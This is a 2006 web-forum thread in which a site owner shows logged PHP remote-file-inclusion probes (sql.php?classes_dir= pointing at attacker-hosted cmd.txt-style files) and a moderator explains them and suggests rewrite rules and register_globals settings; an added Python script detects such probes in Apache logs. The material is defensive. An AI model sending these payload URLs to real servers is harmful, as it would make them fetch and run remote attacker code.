Remote attackers

Hello GT!

I think, guys, that you should make an update of GLinks as soon as possible because remote attackers are making me crazy. I suggest that you take a look at this web site for more information about what's going on.

Here are some examples of what they "search" on my website:

http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt//classes/adodbt/sql.php?classes_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=vaccinated//classes/adodbt/sql.php?classes_dir=http://coyoteco.iespana.es/cmd.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt//classes/adodbt/sql.php?classes_dir=http://futurehousingsystems.com/images/string.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt/classes/adodbt/sql.php?classes_dir=http:/usuarios.arnet.com.ar/classes/adodbt/sql.php?classes_dir=http://www.cafesjakie.nl/images/sjakie/id.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=adobt/classes/adodbt/sql.php?classes_dir=http:/usuarios.arnet.com.ar/larry123/classes/adodbt/sql.php?classes_dir=http://www.cafesjakie.nl/images/sjakie/id.txt?
http://www.website.com/cgi-bin/classifieds/search.cgi?query=príncipe
http://www.website.com/cgi-bin/classifieds/search.cgi?query=peña

etc. etc. ...

Re: [katakombe] Remote attackers In reply to
Hi,

The one thing I noticed as a trend, is they use:

sql.php

..in the query.

One thing you could do, is make a rewrite rule, that blocks sql.php queries from even getting to your site.

Something like:

Code:
RewriteEngine On
RewriteRule sql.php http://www.yoursite.com [L]

However, there is no reason to really worry, as you're not going to be getting hacked by these queries :) (there is nothing GT could release to "fix" this problem, as it's not related to their program, but simply your server). You only really need to worry if you have register_globals set to on, in php.ini.

Hope that eases your mind a bit :)

Cheers

Andy (mod)
andy@ultranerds.co.uk
Re: [Andy] Remote attackers In reply to
Hi Andy!

Thanks, but unfortunately your code:

Quote:
Code:
RewriteEngine On
RewriteRule sql.php http://www.yoursite.com [L]

is not working ..

Quote:
You only really need to worry if you have register_globals set to on, in php.ini

Hmm .. Can you explain what you mean, please?

p.s.

This issue is really annoying
Re: [katakombe] Remote attackers In reply to
Hi,

The formatting is right.

Personally, I think you would be better to ask your host if they can stop people from even trying to access sql.php in ANY queries on your site.

Quote:
Hmm .. Can you explain what you mean, please?

Well, unless you are the system administrator, this won't mean much to you.

Basically, in your php.ini file, you need to change:

Code:
register_globals = On

..to:

Code:
register_globals = Off

However, your host would need to do this if you don't have access to the php.ini file (i.e. you are on a managed/shared server).

Quote:
This issue is really annoying

I don't understand why it's so annoying :/ We get these kinds of requests on our server all the time (pretty much everyone does):
Quote:
64.232.131.130 - - [01/Feb/2006:12:33:07 -0800] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
195.132.21.123 - - [15/Feb/2006:09:27:38 -0800] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"

..it's basically people trying to find "holes" in your server security, even if they don't exist.

Cheers

Andy (mod)
andy@ultranerds.co.uk
Re: [Andy] Remote attackers In reply to
Hi Andy!

Quote:
The formatting is right.

Yea, that's OK. I'll contact my hosting company ..

Thanks again
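
Added example, not part of the thread and not code from Gossamer Threads or either poster: a small log triage script that picks out the request shape discussed above, a PHP script name followed by a parameter whose value is a remote URL (`sql.php?classes_dir=http://...`), whether it arrives in plain or percent-encoded form. It assumes Apache combined log format; the function name is hypothetical and the sample lines are constructed with documentation IPs and example.org hosts.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client, two idents, [time], "METHOD target PROTO", status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A PHP script name followed by a parameter whose value is a remote URL,
# the shape seen in the thread: sql.php?classes_dir=http://host/file.txt
INCLUDE_PROBE = re.compile(
    r'([\w.-]+\.php)\?([\w\[\]]+)=((?:https?|ftp)://[^\s?&]+)', re.IGNORECASE)

# Constructed sample lines (documentation IPs and example.org hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2006:12:33:07 -0800] "GET /cgi-bin/classifieds/search.cgi'
    '?query=adobt//classes/adodbt/sql.php?classes_dir=http://files.example.org/safe.txt?'
    ' HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.11 - - [01/Feb/2006:12:34:10 -0800] "GET /cgi-bin/classifieds/search.cgi'
    '?query=adobt%2Fclasses%2Fadodbt%2Fsql.php%3Fclasses_dir%3Dhttp%3A%2F%2Ffiles.example.org%2Fid.txt%3F'
    ' HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.12 - - [01/Feb/2006:12:35:42 -0800] "GET /cgi-bin/classifieds/search.cgi'
    '?query=pe%C3%B1a HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.13 - - [01/Feb/2006:12:36:01 -0800] "GET /_vti_bin/owssvr.dll?UL=1&ACT=4'
    ' HTTP/1.1" 404 - "-" "-"',
]


def find_include_probes(log_lines):  # hypothetical helper name
    """Return one dict per log line whose request target carries an include probe."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target, status = m.groups()
        # Decode twice so single- and double-encoded variants are seen in plain form.
        decoded = unquote(unquote(target))
        probe = INCLUDE_PROBE.search(decoded)
        if probe:
            hits.append({"client": client, "path": target.partition("?")[0],
                         "status": int(status), "script": probe.group(1),
                         "param": probe.group(2), "remote_url": probe.group(3)})
    return hits


if __name__ == "__main__":
    for hit in find_include_probes(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["script"], hit["param"], hit["remote_url"])
```

The status recorded for each hit is the response of the script that was actually requested (here search.cgi), so a 200 only shows that the search page answered, not that anything was included.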